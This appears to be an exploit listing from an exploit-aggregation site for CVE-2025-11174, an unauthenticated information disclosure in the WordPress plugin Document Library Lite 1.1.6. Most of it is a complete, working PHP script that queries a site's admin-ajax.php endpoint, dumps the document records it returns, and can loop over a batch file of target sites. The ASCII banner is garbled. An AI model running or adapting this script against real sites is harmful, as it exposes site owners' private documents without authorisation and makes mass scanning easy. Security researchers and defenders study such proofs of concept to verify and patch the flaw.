Share
## https://sploitus.com/exploit?id=PACKETSTORM:216390
=============================================================================================================================================
| # Title : WordPress Document Library Lite 1.1.6 Information Disclosure |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.2 (64 bits) |
| # Vendor : https://wordpress.org/plugins/document-library-lite/ |
=============================================================================================================================================
[+] References : https://packetstorm.news/files/id/211137/ & CVE-2025-11174
[+] Summary : The WordPress plugin βDocument Library Liteβ fails to restrict access to internal AJAX API endpoint allowing unauthenticated attackers to fetch document records exposing sensitive metadata.
[+] POC : * Usage: php poc.php https://victim.com
php poc.php https://victim.com output.json
<?php
/**
* CVE-2025-11174 WordPress PoC
* Fixed Version By Indoushka
*/
class Colors {
const R="\033[0;31m"; const G="\033[0;32m"; const Y="\033[1;33m";
const B="\033[0;34m"; const M="\033[0;35m"; const C="\033[0;36m";
const N="\033[0m";
}
function banner() {
echo Colors::R."
βββββββ ββββββββββ βββββββ βββ ββββββββββββββ ββββββ βββ ββββββ
ββββββββ βββββββββββββββββββββββ ββββββββββββββ ββββββ ββββββββββββ
βββββββββ βββββ ββββββ ββββββ ββββββββββββββββββββββββββ ββββββββ
ββββββββββββββββββββββββ ββββββ ββββββββββββββββββββββββββ ββββββββ
ββββββ βββββββββββββββββββββββββββββββββββββββββββ ββββββ ββββββ βββ
ββββββ ββββββββββββ βββββββ βββββββ βββββββββββ ββββββ ββββββ βββ
".Colors::N."
CVE-2025-11174 β Document Library Lite
Unauthenticated Information Disclosure PoC
==========================================
";
}
function normalize($u){
if(!preg_match('#^https?://#i',$u)) $u="https://".$u;
return rtrim($u,"/");
}
function poc($t,$v=false){
$t=normalize($t);
$u=$t."/wp-admin/admin-ajax.php";
echo Colors::G."[+] Target: ".Colors::N.$t.PHP_EOL;
echo " Endpoint: $u".PHP_EOL.PHP_EOL;
$h=[
"User-Agent: CVE-2025-11174-Proof",
"Content-Type: application/x-www-form-urlencoded"
];
$p="action=dll_load_posts";
$c=curl_init();
curl_setopt_array($c,[
CURLOPT_URL=>$u,
CURLOPT_POST=>true,
CURLOPT_POSTFIELDS=>$p,
CURLOPT_HTTPHEADER=>$h,
CURLOPT_RETURNTRANSFER=>true,
CURLOPT_TIMEOUT=>10,
CURLOPT_FOLLOWLOCATION=>true,
CURLOPT_SSL_VERIFYPEER=>false
]);
$r=curl_exec($c);
$s=curl_getinfo($c,CURLINFO_HTTP_CODE);
$e=curl_error($c);
curl_close($c);
echo Colors::G."[+] HTTP: ".Colors::N.$s.PHP_EOL.PHP_EOL;
if($e){
echo Colors::R."[!] CURL ERROR: $e".Colors::N.PHP_EOL;
return ["vuln"=>false];
}
if($s!=200){
echo Colors::Y."[!] Unexpected status".Colors::N.PHP_EOL;
return ["vuln"=>false];
}
$j=json_decode($r,true);
if(json_last_error()!==JSON_ERROR_NONE){
echo Colors::G."[+] No JSON returned β not vulnerable".Colors::N.PHP_EOL;
return ["vuln"=>false];
}
if(isset($j["data"]) || isset($j["recordsTotal"])){
echo Colors::R."[!!!] VULNERABLE".Colors::N.PHP_EOL.PHP_EOL;
echo Colors::G."[+] Retrieved Data:".Colors::N.PHP_EOL;
echo json_encode($j,JSON_PRETTY_PRINT).PHP_EOL;
return ["vuln"=>true,"data"=>$j];
}
echo Colors::G."[+] Not vulnerable".Colors::N.PHP_EOL;
if($v){
echo Colors::Y."[Verbose] Data:".Colors::N.PHP_EOL;
echo json_encode($j,JSON_PRETTY_PRINT).PHP_EOL;
}
return ["vuln"=>false,"data"=>$j];
}
function isPCNTL(){
return function_exists("pcntl_signal") && function_exists("pcntl_async_signals");
}
function main(){
global $argv;
$opts=getopt("vho:",["verbose","help","output:","batch","no-banner"]);
if(!isset($opts["no-banner"])) banner();
if(isset($opts["h"])||isset($opts["help"])){
echo "Usage: php ".basename($argv[0])." [OPTIONS] TARGET\n\n";
exit;
}
$verbose=(isset($opts["v"])||isset($opts["verbose"]));
// Last standalone argument (target)
$args=$argv;
array_shift($args);
foreach($args as $a){
if($a[0]!="-"){$target=$a;break;}
}
if(empty($target)){
echo Colors::R."[!] ERROR: No Target Provided".Colors::N.PHP_EOL;
exit(1);
}
if(isset($opts["batch"])){
$file=$target;
if(!file_exists($file)){
echo Colors::R."[!] ERROR: Batch file not found: $file".Colors::N.PHP_EOL;
exit(1);
}
$list=file($file,FILE_IGNORE_NEW_LINES|FILE_SKIP_EMPTY_LINES);
echo Colors::G."[+] Loaded ".count($list)." targets".Colors::N.PHP_EOL.PHP_EOL;
$res=[];
foreach($list as $x){
echo Colors::C."[~] Testing $x".Colors::N.PHP_EOL;
$r=poc($x,$verbose);
$r["target"]=$x;
$res[]=$r;
echo PHP_EOL;
}
if(isset($opts["o"])||isset($opts["output"])){
$o=$opts["o"]??$opts["output"];
file_put_contents($o,json_encode($res,JSON_PRETTY_PRINT));
echo Colors::G."[+] Saved to: $o".Colors::N.PHP_EOL;
}
exit;
}
$r=poc($target,$verbose);
if(isset($opts["o"])||isset($opts["output"])){
$o=$opts["o"]??$opts["output"];
file_put_contents($o,json_encode($r,JSON_PRETTY_PRINT));
echo Colors::G."[+] Saved to: $o".Colors::N.PHP_EOL;
}
exit($r["vuln"]?0:1);
}
if(isPCNTL()){
pcntl_async_signals(true);
pcntl_signal(SIGINT,function(){
echo PHP_EOL.Colors::Y."[!] Interrupted".Colors::N.PHP_EOL;
exit(130);
});
}
main();
Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================